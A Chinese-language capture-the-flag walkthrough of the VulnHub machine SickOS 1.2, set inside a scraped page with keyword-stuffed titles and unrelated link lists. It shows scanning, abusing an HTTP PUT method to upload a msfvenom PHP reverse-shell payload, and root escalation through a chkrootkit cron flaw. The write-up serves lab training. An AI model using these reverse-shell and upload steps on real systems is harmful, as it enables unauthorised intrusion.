当前位置: 首页 > wzjs >正文

wordpress检查全站链接淘宝seo优化是什么意思

wordpress检查全站链接,淘宝seo优化是什么意思,wordpress页面添加图片,东华软件是外包公司吗一、靶机介绍 靶机基本信息: 靶机下载链接https://www.vulnhub.com/entry/sickos-12,144/作者D4rk发布日期2016年4月27日难度中等 二、信息搜集 记得将网络连接改成nat模式 1、 目标IP探测 目标IP:192.168.155.186 2、 端口扫描 nmap -p- --…

一、靶机介绍

靶机基本信息:

靶机下载链接https://www.vulnhub.com/entry/sickos-12,144/
作者D4rk
发布日期2016年4月27日
难度中等

二、信息搜集

记得将网络连接改成nat模式
1、    目标IP探测
 
目标IP:192.168.155.186
2、    端口扫描

nmap -p- --min-rate 1000 -T4 192.168.155.186


 

   nmap -p22,80 -sV -sC -A  --min-rate 1000 -T4 192.168.155.186


 
三、GETshell


信息不多一个ssh,一个站点。先去站点看看情况
给出一张图片:病毒真的是杀毒公司为了钱而制作的吗
 
查看源码没有什么东西,目录扫描一遍
dirsearch -u http://192.168.155.186
 

好像没有什么有用信息
 
可以确定入口了,查询一下:

searchsploit lighttp


 
但是没有看到1.4.28版本对应漏洞
查询一下网址请求方法:

curl http://192.168.155.186/test/ -vv -X OPTIONS



看到有PUT方法,结合之前的访问目录,猜测文件上传访问反弹shell
制作php脚本

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.155.166 LPORT=443 >shell4431.php



上传:

curl -v -H "Expect:" -T shell4431.php "http://192.168.155.186/test/"



打开msf:

use exploit/multi/handler
show options
set lhost IP
set lport 443
run


 
成功
 

四、提权


内核提权,查看发行版本:

cat /etc/os-release



 
有脚本但是不行
 
列出与系统定时目录相关的文件和配置

ls -la /etc/cron*



找到一个 chkrootkit
有漏洞利用,一个说明文档一个msf脚本
 
将会话放置后台
 


进入特定会话
 

 set seesion 1


成功
 
完成
 

http://www.dtcms.com/wzjs/142560.html

相关文章:

  • 网站做seo有什么作用武汉服装seo整站优化方案
  • 品牌建设的四条主线seo站点是什么意思
  • 网站可以做系统还原吗小说榜单首页百度搜索风云榜
  • 自己做网站用软件下载it培训机构哪家好
  • 湖州童装网站微信推广引流方法
  • 点卡网站怎么做站长之家网站查询
  • 网站建设实训室介绍江苏营销型网站建设
  • 建网站怎么做报分系统开发网站用什么软件
  • 现在建设网站都用什么软件惠州疫情最新消息
  • 闵行网页设计师长沙 建站优化
  • 石家庄做网站wsjz广州信息流推广公司
  • web proxy onlineseo排名大概多少钱
  • 江西合创建设工程有限公司 网站韩国热搜榜
  • 仙居谁认识做网站的央视新闻最新消息今天
  • 临沂手机网站建设如何利用互联网宣传与推广
  • 企业建设网站的步骤是什么网络营销软文范例大全800
  • 移动端网站建设的方案子域名大全查询
  • 团购平台有哪些惠州seo博客
  • 建站做得好的公司江西seo推广
  • 中国做外国网购的网站怎么创建公司网站
  • 自适应网站用什么软件设计兰州做网站的公司
  • 做网站青岛网站收录查询爱站
  • 公众号版网站建设搜索引擎营销的基本流程
  • iis7 新建网站郑州网站公司哪家好
  • 网站建设 科技公司九江seo公司
  • 滨州区建设局网站百度网站流量查询
  • 区政府网站建设专业网站优化外包
  • 网站维护和建设工作范围seo的工作内容
  • 北京模板网站建设费用seopc流量排名官网
  • 做教程网站资源放哪里有河北电子商务seo